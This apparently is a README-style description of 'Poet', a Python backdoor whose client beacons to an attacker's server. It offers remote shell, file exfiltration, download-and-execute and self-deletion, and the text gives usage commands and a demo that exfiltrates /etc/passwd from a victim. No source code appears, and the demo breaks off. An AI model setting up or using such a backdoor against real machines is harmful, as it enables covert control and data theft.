The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn’t running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:
+ reconnaissance
+ remote shell
+ file exfiltration
+ download and execute
+ self destructusage :
Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily try it out, a typical invocation would look like:

Terminal 1:

1

$./client.py-v127.0.0.11

Terminal 2:

1

$sudo./server.py

using the -h flag gives you the full usage.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

$./client.py-h

usage:client.py[-h][-pPORT][-v][-d]IP INTERVAL

positional arguments:

IP server

INTERVAL(s)

optional arguments:

-h,--help show thishelp message andexit

-pPORT,--port PORT

-v,--verbose

-d,--delete delete client upon execution

$./server.py-h

usage:server.py[-h][-pPORT]

optional arguments:

-h,--help show thishelp message andexit

-pPORT,--port PORT

DEMO :
The scenario is, an attacker has gotten access to the victim’s machine and downloaded and executed the client (in verbose mode ;). He/she does not have the server running at this point, but it’s ok, the client waits patiently. Eventually the attacker is ready and starts the server, first starting a shell and executing uname -a, then exfiltrating /etc/passwd. Then he/she exits and detaches from the client, which continues running on the target waiting for the next opportunity to connect to the server.Victim’s Machine (5.4.3.2):